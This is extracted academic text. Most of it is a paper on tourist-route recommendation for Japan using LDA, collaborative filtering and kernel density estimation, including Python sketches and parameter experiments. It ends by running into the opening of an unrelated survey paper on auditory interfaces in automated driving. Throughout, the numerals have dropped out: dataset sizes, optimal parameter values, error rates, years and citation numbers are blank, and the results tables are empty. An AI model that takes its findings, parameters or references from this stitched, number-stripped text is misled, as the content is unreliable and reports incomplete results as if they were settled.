that these algorithms are feasible, and they are applied in this paper. accordingly, we present below a method for the recommendation and generation of tourist routes based on lda and collaborative filtering. ii. related work the planning of a travel route is a complex and comprehensive process that requires consideration of many factors, such as the user's demand, the price of the route, the arrangement of attractions, and transportation. the basic theory of route planning and generation involves multiple disciplines, including data mining, statistical machine learning, network search, pattern recognition, and spatial data mining. a scientific travel route displays as many tourist attractions and landscapes as possible to visitors, thereby improving the satisfaction and happiness of tourists and promoting the long-term development of the tourism industry. in recent years, with the rapid development of artificial intelligence technology, route planning algorithms such as genetic algorithms, particle swarm optimization, simulated annealing, ant colony algorithms and immune algorithms have emerged. the planning and generation of a travel route mainly involves generating recommended cities according to the user's needs and reasonably planning the playing time of each recommended city. this paper takes collected historical travel route datasets of japan as the research object and mainly studies the recommendation and generation of the travel city time-space list in travel route planning. we propose to use lda and collaborative filtering to design the travel city recommendation algorithm, use the kde algorithm to optimize the playing time of each city, and then generate a time-space list of the user's playing cities. in the experimental part, the results of the topic city model based on lda and the different
travel route recommendation algorithms are introduced in detail. the relevant city error rate of the topic city model based on lda under different parameters is compared and the optimal model parameters are obtained. finally, the performance of the different recommendation algorithms is evaluated and analyzed. iii. travel route recommendation and generation system the travel route recommendation algorithm based on kde and classification comprises the following modules: a data preprocessing and feature extraction module, a playing time estimation module based on kde, a topic city generation module based on lda (or a recommended city generation module based on collaborative filtering), and a travel route generation module. the data preprocessing and feature extraction module transforms the original data set into a travel route text set through operations such as data cleaning, classification and feature extraction, so that it conforms to the input format of the lda model (a document-content distribution format). the original data set comes from the historical travel data set of japan and contains about , travel routes. the playing time estimation module based on kde uses the kde algorithm to estimate the user's total playing time and the playing time of the input cities, improving the accuracy of the playing times and the quality of the recommendation algorithm. the topic city generation module based on lda is a core module of the algorithm: it computes the topic probability distribution of each travel route text and the characteristic city probability distribution of each topic through the established travel city topic model based on lda, and the probability distribution of characteristic cities is then converted into a list of recommended cities. the recommended city generation module based on collaborative filtering is likewise a core module: it computes the list of recommended cities satisfying the conditions through the collaborative filtering algorithm. the travel route generation module is the overall output module of the algorithm: after processing the output of the previous modules, a complete travel route is formed, including the user's total playing time, the list of travel cities, and the playing time of each city. the system structure of the algorithm is shown in the two figures below. figure . lda travel route recommendation algorithm based on kde and classification. figure . collaborative filtering travel route recommendation algorithm based on kde and classification. a. data preprocessing and feature extraction module data preprocessing is the basis for the algorithm to obtain good training and output results. the data cleaning and preprocessing module mainly performs feature extraction and data classification. the given original data set is mainly json-format travel route data; each route is an ordered list of city entries, and the attributes of each entry include the city id (id), trip or city name (name), type, and travel time (travel_times or transit_time). data cleaning extracts the useful feature data from the data set and completes missing data. the extracted data is then sorted according to specific rules, where we classify routes according to their number of cities. finally, through data preprocessing, the data is organized into a data set that can be used as lda model input, i.e., a document-content distribution format.
the specific data preprocessing steps are: ) reading the json data file using python code; the city name (name), travel time (travel_times), and route number (plan_id) of each route are read; ) calculating the number of times each city is written, where the number of writings = the total playing time (hours) / ; ) writing the extracted features into different output files according to a specific format ([number of lines, route id, city name]); ) classifying the output according to the number of cities in each route (the categories , - , - , - , and ) and storing it in the corresponding files; ) completing the writing of the data and saving the files.
table i. route basic attribute table
attribute: id | name | plan_id | type | hours | daysep
meaning: city id | city name | route id | route type | playing time | flag for end of day
value type: string | string | string | string | list | bool
example: ' ' | 'osaka' | ' ' | 'place' | [ . , . ] | true
b. playing time estimation module based on kde in general, the total playing time of a user is calculated from rules of thumb, for example, total playing time (hours) = total playing time (days) * playing hours per day. the playing time of a city the user wants to visit is then calculated by multiplying the topic distribution probability obtained by lda by the total playing time. in practice, this method lacks flexibility and cannot adapt to all user inputs; the resulting time error is relatively large, which leads to poor recommendation quality. therefore, in this paper we use the kde (kernel density estimation) algorithm to estimate the user's total playing time and the playing time of the cities the user wants to visit, improving the recommendation quality. assuming that $t_1, t_2, \ldots, t_n$ are $n$ samples of the total playing time $t$, and that the probability density function of the total playing time is $f(t)$, the kernel density estimate of $f(t)$ is $$\hat{f}_h(t) = \frac{1}{n}\sum_{i=1}^{n} K_h(t - t_i) = \frac{1}{nh}\sum_{i=1}^{n} K\!\left(\frac{t - t_i}{h}\right),$$ where $h$ is the bandwidth, $n$ is the number of samples, and $K(\cdot)$ is the kernel function. the algorithm steps for playing time estimation based on kde are: ) according to the number of playing days, the historical routes are categorized into five categories: - days, - days, - days, - days, and days or more; ) determining the corresponding route data category according to the number of playing days input by the user; ) reading the playing time of each route in that category and saving it as a list a; ) using list a as the input of the kernel density estimation function to obtain the kernel density estimate; ) randomly sampling a value from the obtained kernel density as the user's total playing time, denoted h; ) repeating the above steps to obtain the list g of playing times of the input cities. with the above algorithm we obtain the user's total playing time h and the list of playing times of the input cities; these two values will be used later in the topic city generation module based on lda. a minimal code sketch of this procedure is given below.
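the following is a minimal sketch, not the authors' implementation, of the kde-based playing-time sampling described above. it uses scipy's gaussian_kde; the hour values and function names are illustrative assumptions only.

# minimal sketch of the kde-based playing-time estimation (illustrative data)
import numpy as np
from scipy.stats import gaussian_kde

def sample_playing_time(history_hours, n_samples=1):
    """fit a gaussian kde to historical playing times (hours) and draw random samples."""
    kde = gaussian_kde(np.asarray(history_hours, dtype=float))  # bandwidth chosen by scott's rule
    return kde.resample(n_samples).ravel()                      # random draws from the estimated density

# example: total playing times (hours) of historical routes in one day-count category
category_hours = [28.0, 31.5, 26.0, 35.0, 30.0, 29.5, 33.0]
h_total = sample_playing_time(category_hours)[0]                           # step 5: total playing time h
g_cities = sample_playing_time([3.0, 4.5, 5.0, 6.0, 4.0], n_samples=2)     # step 6: times for two input cities
print(h_total, g_cities)

sampling from the fitted density rather than applying a fixed rule of thumb is what gives the module its flexibility across different user inputs.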
c. topic city generation module based on lda the lda model is a probabilistic topic model for modeling discrete data sets (such as document sets). lda is essentially an unsupervised machine learning model that expresses the high-dimensional text word space as a low-dimensional topic space, ignoring category information. by topic-modeling a document set, the lda model produces a brief description of each document, retaining the essential statistical information and helping to process large-scale document sets efficiently [ ]. in general, applying the lda model requires the premise that each document is composed of a number of latent topics, which in turn are composed of a number of specific words in the text, ignoring word order and syntactic structure. for the travel route dataset of this paper, data preprocessing and feature extraction produce a document set containing discrete city names: each document is composed of a number of travel cities, there is no syntactic structure, and the words are in no specific order, which accords with the premise and data requirements of the lda model. in this paper, the preprocessed travel route training set is reduced in dimensionality and expressed in the form of topic probabilities, so that specific topic cities can be extracted from the topic probability list to form a recommended city list. figure . travel city topic model based on lda. the figure above shows the established travel city topic model based on lda. there are three layers in the model: the document collection layer of travel cities, the topic layer, and the characteristic city layer. the travel city topic model based on lda generates a characteristic city as follows: ) for each topic, a word multinomial distribution vector φ is drawn from the dirichlet distribution dir(β); ) the number of words n is drawn from a poisson distribution; ) a topic distribution probability vector θ of the text is drawn from the dirichlet distribution dir(α); ) for each of the n words wn in the text: a) a topic z is drawn from the multinomial distribution multinomial(θ); b) the word wn is drawn from the multinomial conditional probability distribution multinomial(φ) of topic z. to obtain the probability distribution of characteristic cities, model parameter estimation methods are needed to estimate the word probability distribution under each topic and the topic probability distribution of each text. the most commonly used parameter estimation methods are expectation propagation, variational bayesian inference and gibbs sampling [ ] [ ]. the efficient gibbs sampling method is used in this paper to estimate the probability distribution of characteristic cities from the known travel route text set.
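before turning to the parameter-estimation formulas, the following minimal sketch shows how such a travel-city topic model could be trained in practice. it uses gensim's LdaModel, which relies on online variational bayes rather than the gibbs sampler used in this paper, and the routes shown are made-up illustrations, so this is an assumption-laden sketch rather than the authors' code.

# minimal sketch of training a travel-city topic model (illustrative routes)
from gensim import corpora
from gensim.models import LdaModel

routes = [["osaka", "kyoto", "nara"],            # each "document" is one historical route
          ["tokyo", "hakone", "kyoto"],
          ["osaka", "kobe", "kyoto", "nara"]]
dictionary = corpora.Dictionary(routes)           # word-id mapping table
corpus = [dictionary.doc2bow(r) for r in routes]  # document-content (bag-of-cities) format

lda = LdaModel(corpus=corpus, id2word=dictionary,
               num_topics=2, alpha="symmetric", eta=0.01,   # eta plays the role of the prior beta
               passes=10, random_state=0)

print(lda.show_topic(0, topn=3))                  # characteristic-city distribution of topic 0
print(lda.get_document_topics(corpus[0]))         # topic distribution theta of the first route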
according to the lda model, the probability of a text is $$p(\mathbf{w}\mid\alpha,\beta)=\int p(\theta\mid\alpha)\left(\prod_{n=1}^{N}\sum_{z_n} p(z_n\mid\theta)\,p(w_n\mid z_n,\beta)\right)d\theta.$$ using the gibbs sampling method, the topic of each word is sampled, and the parameter estimation problem is converted into calculating the conditional probability of the topic assignments given the word sequence: $$p(z_i=k\mid \mathbf{z}_{\neg i},\mathbf{w}) \propto \frac{n_{k,\neg i}^{(t)}+\beta_t}{\sum_{t=1}^{V}\left(n_{k,\neg i}^{(t)}+\beta_t\right)}\left(n_{m,\neg i}^{(k)}+\alpha_k\right).$$ in the above expression, $z_i$ is the topic variable of the i-th word, the subscript $\neg i$ indicates that the i-th word is excluded, $n_k^{(t)}$ is the number of occurrences of word t in topic k, $\beta_t$ is the dirichlet prior of word t, $n_m^{(k)}$ is the number of words assigned to topic k in text m, and $\alpha_k$ is the dirichlet prior of topic k. based on these counts and the topic assigned to each word, the parameters to be calculated are estimated as $$\varphi_{k,t}=\frac{n_k^{(t)}+\beta_t}{\sum_{t=1}^{V}\left(n_k^{(t)}+\beta_t\right)},\qquad \theta_{m,k}=\frac{n_m^{(k)}+\alpha_k}{\sum_{k=1}^{K}\left(n_m^{(k)}+\alpha_k\right)},$$ where $\varphi_{k,t}$ is the probability of word t in topic k and $\theta_{m,k}$ is the probability of topic k in text m. the input and output of the travel city topic model based on lda are shown in table ii.
table ii. input and output of travel city topic model based on lda
input: preprocessed and classified travel route text set (one route per line); the number of topics k; hyperparameters α and β.
output: . the topic number assigned to each word of each text; . the topic probability distribution θ for each text; . the characteristic city probability distribution for each topic; . the word-id mapping table used in the program; . the top-n characteristic city words, sorted from high to low, for each topic.
d. travel city generation module based on collaborative filtering because there are a large number of travel routes in the data set of this research, before applying the collaborative filtering recommendation algorithm we regard each travel route as a user and each travel city in a route as an item. since the number of items is much larger than the number of users, we use an item-based collaborative filtering recommendation algorithm. the travel city generation module based on collaborative filtering consists of the following three steps: ) establishing a route-city scoring dictionary. in this setting, the score is the playing time (hours) of each city. based on the preprocessed travel route text set, a route-city scoring dictionary is established: the key of the dictionary is the route number and the value is itself a dictionary whose keys are city names and whose values are the playing times of those cities. the format is as follows: dic = {'route-1': {'city-1': playing-time-1, 'city-2': playing-time-2, …, 'city-n': playing-time-n}, 'route-2': {'city-1': playing-time-1, 'city-2': playing-time-2, …, 'city-n': playing-time-n}, …, 'route-n': {'city-1': playing-time-1, 'city-2': playing-time-2, …, 'city-n': playing-time-n}}. ) calculating the similarity between cities and obtaining a list of similar cities (neighbours) for each city; the euclidean distance is used to measure the similarity between cities. ) generating a list of recommended cities. a weighted sum over all cities in the neighbourhood set is computed, giving the predicted time of the target route for every city; after the playing-time set is sorted, the top-n list is taken as the city recommendation list.
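a minimal sketch of the three steps above follows. the scores dictionary is a toy stand-in for the route-city scoring dictionary, and the conversion of euclidean distance d to a similarity via 1/(1+d) is a common convention assumed here, since the paper does not state its exact conversion.

# minimal sketch of the item-based collaborative filtering module (toy data)
import math
from collections import defaultdict

scores = {"route-1": {"osaka": 5.0, "kyoto": 4.0, "nara": 2.5},
          "route-2": {"osaka": 4.5, "kyoto": 5.5, "tokyo": 6.0},
          "route-3": {"kyoto": 3.0, "tokyo": 5.0, "hakone": 2.0}}

def city_similarity(a, b):
    """similarity of two cities from playing times in routes containing both, 1/(1+euclidean distance)."""
    common = [r for r in scores if a in scores[r] and b in scores[r]]
    if not common:
        return 0.0
    d = math.sqrt(sum((scores[r][a] - scores[r][b]) ** 2 for r in common))
    return 1.0 / (1.0 + d)

def recommend(input_cities, top_n=3):
    """weighted sum of neighbour similarities times playing times; returns predicted times per city."""
    totals, weights = defaultdict(float), defaultdict(float)
    for r in scores:
        for city, hours in scores[r].items():
            if city in input_cities:
                continue
            for chosen in input_cities:
                sim = city_similarity(city, chosen)
                totals[city] += sim * hours
                weights[city] += sim
    ranked = sorted(((totals[c] / weights[c], c) for c in totals if weights[c] > 0), reverse=True)
    return [(c, round(t, 2)) for t, c in ranked[:top_n]]

print(recommend(["osaka"]))   # top-n candidate cities with predicted playing times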
e. travel route generation module the travel route generation module is the integration and output module of the entire algorithm. the playing time estimation module based on kde provides the user's total playing time h and the playing time list g of the input cities, and the topic city generation module based on lda provides the probability distribution of characteristic cities, i.e., the recommended cities list. we need to normalize the probabilities of the extracted topic cities, derive the playing time of each recommended city from the processed probability values, and finally form a complete travel route. the main process of the travel route generation module is as follows (a runnable rendering is given at the end of this subsection):
a. rest ← h − sum(g)  # total playing time available for the recommended cities
b. sum_prop ← 0  # total probability value
c. recom_list ← get_recom()  # list of recommended cities of the form [[city-1, probability-1], [city-2, probability-2], …]
d. trip_list ← null  # the route list, initially empty
e. for i ← 1 to size(recom_list) do sum_prop ← sum_prop + the probability of recom_list[i] repeat
f. for i ← 1 to size(recom_list) do the probability of recom_list[i] ← the probability of recom_list[i] / sum_prop * rest repeat
g. for i ← 1 to size(recom_list) do trip_list[i] ← recom_list[i] repeat
h. add the cities entered by the user and their playing times to trip_list
i. return trip_list
through the travel route generation module, a complete travel route is obtained. the specific route format is [[city-1, playing time-1], [city-2, playing time-2], …, [city-n, playing time-n]].
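the steps a-i above can be rendered directly in python. in the sketch below, the recommended list stands in for the output of the lda module (get_recom() in the pseudocode), and all hour and probability values are illustrative assumptions.

# runnable rendering of steps a-i of the travel route generation module (illustrative values)
def generate_route(h, input_cities, input_times, recom_list):
    """scale the recommended cities' probabilities to the remaining playing time."""
    rest = h - sum(input_times)                    # a. playing time left for recommended cities
    sum_prop = sum(p for _, p in recom_list)       # b./e. total probability mass
    trip_list = [[city, p / sum_prop * rest]       # f./g. normalise and convert to hours
                 for city, p in recom_list]
    trip_list += [[c, t] for c, t in zip(input_cities, input_times)]   # h. add the user's own cities
    return trip_list                               # i. [[city, playing time], ...]

recommended = [["kyoto", 0.4], ["tokyo", 0.35], ["nara", 0.25]]        # stand-in for get_recom()
print(generate_route(h=30.0, input_cities=["osaka", "nagoya"],
                     input_times=[6.0, 4.0], recom_list=recommended))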
iv. the result and analysis of experiment the evaluation of experimental results is an important part of this work. this chapter shows and evaluates the experimental results of the different recommendation algorithms, including the results of topic city generation based on lda, the results of the lda travel route recommendation algorithm based on kde and classification, and the results of the collaborative filtering travel route recommendation algorithm based on kde and classification; the performance of the different lda-based travel route recommendation and generation algorithms and the relevant city error rate are compared under different parameters. in the recommendation field, commonly used evaluation indicators include the recall rate and the precision rate [ ][ ]; generally, the accuracy of a recommendation algorithm is evaluated with these two rates. in e-commerce systems, the conceptual formulas for the recall rate and precision rate are as follows [ ]: precision rate = the number of recommended items the user likes / the number of items recommended by the system; recall rate = the number of the user's favorite items in the recommended list / the number of the user's favorite items in the system. based on the concept and calculation of precision and recall, combined with the research content of this paper, we propose two evaluation indicators, the relevant city error rate and the route correlation rate, which are used to evaluate the results of the topic city generation model based on lda and the route generation results of the recommendation algorithms, respectively. in popular terms, the relevant city error rate is the probability that a tourist city is assigned to a wrong topic (route). here we use p(e) to denote it, calculated as $$p(e) = \frac{c_i}{a_i},$$ where $c_i$ is the number of tourist cities that are assigned to the wrong topic in the probability distribution of the i-th topic, that is, cities that do not appear in the same historical route as any other city of that topic, and $a_i$ is the total number of cities in the probability distribution of the i-th topic. the lower the relevant city error rate, the higher the quality of the model output and the more easily it is accepted; in practical applications the relevant city error rate is generally not more than . . following the relevant city error rate, we define the route correlation rate, denoted r(t): $$r(t) = \frac{t_i'}{t_i},$$ where $t_i'$ is obtained from the number of recommended cities in the i-th generated route that are assigned to wrong routes, that is, cities that do not appear in the same historical route as any other city of the generated route, and $t_i$ is the total number of cities in the i-th generated route. if a recommended route contains cities that have no relevance to the other cities in the route, it is often unacceptable; therefore, the higher the route correlation rate, the better the performance of the route recommendation and generation algorithm and the more consistent it is with the user's expectations. in practical applications, the route correlation rate is generally not less than %. a. the evaluation of topic city generation model based on lda the number of topics k, the number of iterations, and the hyperparameters α and β of the lda model all affect the probability distribution of the final topic cities. therefore, in order to obtain the optimal topic city probability distribution, we examine the probability distribution of topic cities under different parameters. to ensure uniform experimental premises, the sample set for all the experimental results below is a set of - tourist route texts. ) experimental results under different hyperparameter α: we set the initial number of topics k = , the number of iterations niter = , and the hyperparameter β = . ; the hyperparameter α then takes the values , , , up to . the table and figure below show the experimental results for the different values of α; from them it can be seen that the optimal value of α is . table iii. the experimental results of different values of hyperparameter α (rows: log and p(e) for each tested value of α). figure . the experimental results of different values of hyperparameter α. ) experimental results under different hyperparameter β: we set the initial number of topics k = , the number of iterations niter = , and the hyperparameter α = ; the hyperparameter β then takes the values . , . , . , up to . . the table and figure below show the experimental results for the different values of β; from them it can be seen that the optimal value of β is . . table iv. the experimental results of different values of hyperparameter β (rows: log and p(e) for each tested value of β).
figure . the experimental results of different values of hyperparameter β. ) experimental results under different numbers of topics k: we set the number of iterations niter = and the hyperparameters α = and β = . ; the number of topics k then takes the values , , , up to . the table and figure below show the experimental results for the different numbers of topics k; from them it can be seen that the optimal number of topics is . table v. the experimental results of different numbers of topics k (rows: log and p(e) for each tested k). figure . the experimental results of different numbers of topics k. ) experimental results under different numbers of iterations n: we set the initial number of topics k = and the hyperparameters α = and β = . ; the number of iterations then takes the values , , , up to . the table and figure below show the experimental results for the different numbers of iterations; from them it can be seen that the optimal number of iterations is . table vi. the experimental results of different numbers of iterations n (rows: log and p(e) for each tested n). figure . the experimental results of different numbers of iterations n. from the above experimental results, it can be concluded that the optimal parameters of the topic city generation model based on lda are k = , hyperparameter α = , β = . , and number of iterations n = . under the optimal parameters, the relevant city error rate is . , which is acceptable in practical applications. b. evaluation of lda travel route recommendation algorithm based on kde and classification in order to reduce the contingency of the experimental results and improve their confidence, the experimental evaluation in this section follows these steps: ) randomly generating groups of input city lists and playing times; ) using the randomly generated input city lists and playing times as input to the recommendation algorithm; ) recording the output of the algorithm for the sets of input data and taking the average relevant city error rate over the sets of experiments, denoted ei; ) repeating steps ( )-( ) times to obtain a value of ei for each repetition. figure . the route correlation rate of the lda travel route recommendation algorithm based on kde and classification. the figure shows the experimental results obtained in the independent experiments. it can be seen that the route correlation rate remains stable at around %; because the topic city generation model based on lda has a certain degree of randomness in generating the recommended city list, there will be irrelevant cities in the resulting travel routes. nevertheless, the route correlation rate of the generated travel routes is about %, which is within the normal error range. therefore, the performance of the lda travel route recommendation algorithm based on kde and classification is relatively good and suitable for practical applications.
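the repeated evaluations above rely on the route correlation rate r(t). the sketch below is one plausible reading of that metric, computing the share of cities in a generated route that co-occur with at least one other city of the route somewhere in the historical routes; since the paper treats higher values as better, the sketch uses this co-occurrence share rather than the error share, and the data are made up.

# minimal sketch of computing the route correlation rate r(t) under the reading described above
def route_correlation_rate(generated_route, historical_routes):
    cities = list(generated_route)
    related = 0
    for city in cities:
        others = set(cities) - {city}
        # a city counts as "related" if some historical route contains it together
        # with at least one other city from the generated route
        if any(city in route and others & set(route) for route in historical_routes):
            related += 1
    return related / len(cities) if cities else 0.0

historical = [["osaka", "kyoto", "nara"], ["tokyo", "hakone"], ["kyoto", "tokyo"]]
print(route_correlation_rate(["osaka", "kyoto", "tokyo"], historical))   # 1.0 for this toy data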
c. evaluation of collaborative filtering travel route recommendation algorithm based on kde and classification in order to reduce the contingency of the experimental results and improve their confidence, the experimental evaluation in this section also follows these steps: ) randomly generating groups of input city lists and playing times; ) using the randomly generated input city lists and playing times as input to the recommendation algorithm; ) recording the output of the algorithm for the sets of input data and taking the average relevant city error rate over the sets of experiments, denoted ei; ) repeating steps ( )-( ) times to obtain a value of ei for each repetition. figure . the route correlation rate of the collaborative filtering travel route recommendation algorithm based on kde and classification. the figure shows the experimental results obtained in the independent experiments. it can be seen that the route correlation rate remains stable at around %; compared with the results of the lda travel route recommendation algorithm based on kde and classification, the correlation rate obtained by the collaborative filtering algorithm is higher, but the difference is not large. this is because the core of the collaborative filtering algorithm is a traditional statistical computation with no randomness. the error of approximately % in the route correlation rate is due to the irrelevance of some of the users' input city lists: in actual applications, cities entered by the user may not appear in the historical routes at all, a systematic error caused by the incompleteness of the historical data that is not accounted for in our experiments. d. comparison of algorithm output results
table vii. the output results of the different algorithms
input of the algorithms: total days of travel: ; cities that the user wants to go to: osaka, nagoya
output of the non-improved lda recommendation algorithm: [naoshima: . , yamanashi: . , osaka: . , nagoya: . ]
output of the non-improved collaborative filtering recommendation algorithm: [yakushima: . , naoshima: . , osaka: . , nagoya: . ]
output of the lda travel route recommendation algorithm based on kde and classification: [kyoto: . , nakafurano-cho: . , osaka: . , nagoya: . ]
output of the collaborative filtering travel route recommendation algorithm based on kde and classification: [kyoto: . , tokyo: . , osaka: . , nagoya: . ]
the table above gives the travel routes generated by the different recommendation algorithms. it can be seen from the results that the improved travel route recommendation algorithms are significantly better than the non-improved algorithms in the playing time schedule: the playing times are more reasonable than with the previous algorithms, and cases where the playing time is too short are reduced, reaching our expected goal. e. summary of experimental results in order to evaluate the model results and the recommendation algorithms, this chapter first proposed two new evaluation indicators based on the principles of recall rate and precision rate: the relevant city error rate and the route correlation rate. then, the influences of the number of topics k, the number of iterations, and the hyperparameters α and β on the lda topic city generation model were presented.
after many experiments, the optimal model parameters are determined to be k = , α = , β = . , niter = . finally, the performance of the different recommendation algorithms is evaluated. the experimental results show that the route correlation rate of the collaborative filtering travel route recommendation algorithm based on kde and classification is slightly higher, by about %, than that of the lda travel route recommendation algorithm based on kde and classification. in practice, different recommendation algorithms can be selected according to the user's actual demand. the final experimental results show that the optimization effect of the proposed classification method and kde algorithm is evident: the lda and collaborative filtering algorithms optimized by the classification method improve the route correlation rate, bringing it above %, and the kde algorithm optimizes the playing times, making the playing time of each city more reasonable, which demonstrates that the method of this paper has considerable reference value. v. conclusion this paper proposed a travel route recommendation and generation algorithm based on lda and collaborative filtering; the core of the algorithm is the lda topic model and collaborative filtering, and the lda and collaborative filtering travel route recommendation algorithms based on kde and classification are proposed. although the optimized algorithms achieve good performance, a lot of work remains to be done, including: ) the recommendation algorithm based on the lda topic model has a certain degree of randomness in generating the recommended city list, so the resulting travel routes may contain cities unrelated to the historical routes, though within an acceptable error rate; the output of the recommendation algorithm based on collaborative filtering is relatively fixed and does not generate new feasible routes, and although the collaborative filtering algorithm has no randomness problem, the irrelevance of some users' input city lists still causes a certain error rate. a method that combines the lda topic model and the collaborative filtering algorithm could therefore make the recommendation performance better. ) so far, the hyperparameters of the lda model, such as the number of topics k, α and β, are mainly adjusted manually by empirical rules, which requires a huge amount of experimental work. in the future, methods from reinforcement learning and self-play could be considered to learn the optimal parameters; this is also a research hotspot in machine learning in recent years. ) the evaluation method of travel routes should be studied further: because the evaluation of a travel route is partly subjective, actual assessment is difficult, and at present only quantifiable indicators can be extracted to evaluate part of the reasonability of a route, so the evaluation indicators may not be comprehensive. later, a comprehensive and reasonable evaluation method of travel routes can be studied and proposed. acknowledgements this paper is partially supported by the qinghai university student science and technology innovation fund project (no. -qx- ). reference [ ] wohlin c, runeson p, höst m, et al. experimentation in software engineering [j]. ieee transactions on software engineering, , se- ( ): - .
[ ] mabao z. research on methods and techniques of tourism travel decision support system [d]. shandong university of science and technology. [ ] baohui jin. travel route choice model based on regret theory. computer modelling & new technologies, ( ): - . [ ] changing x, kewen x, yongwei q, et al. tourist route recommendation based on dynamic clustering [j]. journal of computer applications, , ( ): - . [ ] hui w, changhua l, yuling w, et al. application of ant colony optimization in tourism route planning [j]. software guide, , ( ): - . [ ] hou l, yang h, fan y, et al. research on personalized trip itinerary based on ils-cs optimization [j]. journal of frontiers of computer science & technology, , ( ): - . [ ] yajun li, qing lu, changyong liang. review of collaborative filtering [j]. pattern recognition and artificial intelligence, , ( ): - . [ ] qiang c, dongmei h, haisheng l, et al. personalized resource recommendations based on tags and collaborative filtering [j]. computer science, , ( ): - . [ ] linden g, smith b, york j. amazon.com recommendations: item-to-item collaborative filtering [j]. ieee internet computing, , ( ): - . [ ] blei d m, ng a y, jordan m i. latent dirichlet allocation [j]. journal of machine learning research, , : - . [ ] krestel r, fankhauser p, nejdl w. latent dirichlet allocation for tag recommendation [c]. acm conference on recommender systems, recsys, new york, ny, usa. dblp, : - . [ ] epanechnikov v a. non-parametric estimation of a multivariate probability density [j]. theory of probability & its applications, , ( ): - . [ ] friedman n, dan g, goldszmidt m. bayesian network classifiers [j]. machine learning, , ( - ): - . [ ] heinrich g. parameter estimation for text analysis [j]. technical report, . [ ] billsus d, pazzani m j. learning collaborative information filters [c]// proceedings of the th national conference on artificial intelligence (aaai). san francisco: aaai press, : - . [ ] basu c, hirsh h, cohen w. recommendation as classification: using social and content-based information in recommendation [c]// proceedings of the th national conference on artificial intelligence. san francisco: aaai press, : - . [ ] yang s h, long b, smola a j, et al. collaborative competitive filtering: learning recommender using context of user choice [c]// international acm sigir conference on research and development in information retrieval. acm, : - . [ ] george g, haas m r, pentland a. big data and management: from the editors [j]. academy of management journal, , ( ): - .

auditory interfaces in automated driving: an international survey
pavlo bazilinskyy and joost de winter
department of biomechanical engineering, faculty of mechanical, maritime and materials engineering, delft university of technology, delft, the netherlands. submitted may ; accepted july ; published august . corresponding author: pavlo bazilinskyy, p.bazilinskyy@tudelft.nl. academic editor: dan stowell. doi . /peerj-cs. copyright bazilinskyy and de winter, distributed under creative commons cc-by.
abstract this study investigated people's opinion on auditory interfaces in contemporary cars and their willingness to be exposed to auditory feedback in automated driving. we used an internet-based survey to collect , responses from countries.
the respondents stated their attitudes towards two existing auditory driver assistance systems, a parking assistant (pa) and a forward collision warning system (fcws), as well as towards a futuristic augmented sound system (fs) proposed for fully automated driving. the respondents were positive towards the pa and fcws, and rated the willingness to have automated versions of these systems as . and . , respectively (on a scale from = disagree strongly to = agree strongly). the respondents tolerated the fs (the mean willingness to use it was . on the same scale). the results showed that among the available response options, the female voice was the most preferred feedback type for takeover requests in highly automated driving, regardless of whether the respondents' country was english speaking or not. the present results could be useful for designers of automated vehicles and other stakeholders. subjects human-computer interaction, autonomous systems, multimedia keywords driverless car, crowdsourcing, survey, questionnaire, fully automated driving, highly automated driving, auditory interface, auditory feedback, warning introduction the development of automated driving systems the development of automated driving technology is a key topic in modern transportation research. a transition to automated driving may have a large positive influence on society (european commission, ). each year more than , , fatal accidents occur on roads worldwide, with the lower-income countries being overrepresented (gururaj, ; world health organization, ). if automated driving systems are designed to be fully capable and reliable, a very large portion (though probably not all) of road traffic accidents could be prevented (goodall, ). furthermore, traffic congestion, gas emissions, and fuel consumption may be reduced considerably thanks to automated driving systems. the control of vehicles can be represented as a spectrum consisting of five levels: ( ) manual driving, ( ) driver assistance, ( ) partially automated driving, ( ) highly automated driving, and ( ) fully automated driving (gasser & westhoff, ). the introduction of driver assistance systems to the public took place in the s with the release of adaptive cruise control (acc), a system that automates the longitudinal motion of the vehicle (beiker, ). advancements in cameras, radars, lasers, and artificial intelligence have led to the creation of systems that make partially automated driving possible. partially automated driving systems control not only the longitudinal motion of a vehicle but also its lateral motion. examples of such systems are bmw's traffic jam assistant (bmw, ), volvo's acc with steer assist (volvo, a), and mercedes' distronic plus with steering assist (daimler, ). in partially automated driving, drivers are usually required to keep their eyes focused on the road and intermittently touch the steering wheel. highly automated driving (had) is a next step.
in had, the human can release the hands from the steering wheel and is no longer required to monitor the road permanently (e.g., banks, stanton & harvey, ). however, humans still have an important role in the control of highly automated vehicles (alicandri & moyer, ; dingus, hulse & barfield, ; levitan, golembiewski & bloomfield, ). in had, drivers can be asked to take over control of the vehicle when required, for example, when the vehicle automation cannot solve a task in a demanding traffic environment. the time between issuing a 'takeover request' and the required moment of transition of control from the vehicle to the human is a critical design parameter (gold et al., ). if the driver spends too much time on reclaiming control of the vehicle, or if the driver does not comprehend the warning signal sent by the vehicle, an accident may result. clearly, the design of appropriate feedback is essential for the successful introduction of had to the public roads. indeed, inappropriate feedback is regarded as a primary cause of automation-induced accidents (norman, ). fully automated driving (fad) will be the next and final iteration in automated driving. people have been envisioning this step in the development of transportation for a long time. almost half a millennium ago, leonardo da vinci envisioned a pre-programmed clockwork cart (weber, ). in during the new york world's fair, general motors presented their vision of the world years into the future ( – ): in their futurama exhibition, they introduced a concept of automated highways with trench-like lanes for separating traffic (wetmore, ). in , the futurist isaac asimov wrote a short story 'sally' that pictured a situation where only cars that did not require a human driver were allowed on the roads. fad offers numerous potential benefits. it could reduce stress and allow the operator to engage in non-driving tasks such as working, using in-vehicle entertainment, or resting (e.g., jamson et al., ; llaneras, salinger & green, ). furthermore, fad is a recommended solution for achieving an optimal traffic flow, for example by means of platooning on highways (bergenhem et al., ; varaiya, ). the google driverless car is one of the existing prototypes of fad (markoff, ). however, this particular vehicle does not fully comply with the principles of fad; in reality, the google driverless car relies on accurate three-dimensional maps of the environment and currently cannot cope with all dynamic environments of high complexity. considerable advances in sensing and artificial intelligence are required before fad becomes practically feasible on all public roads. continental, a leading german manufacturer specialising in components for the automotive industry, predicts that fad will be launched in the year (continental, ), whereas some voices have argued that fad will never happen (gomes, ; underwood, ; yoshida, ). although automated driving systems are expected to improve safety, certain side effects may occur regarding the human factor (e.g., bainbridge, ; desmond, hancock & monette, ; merat et al., ; brandenburg & skottke, ).
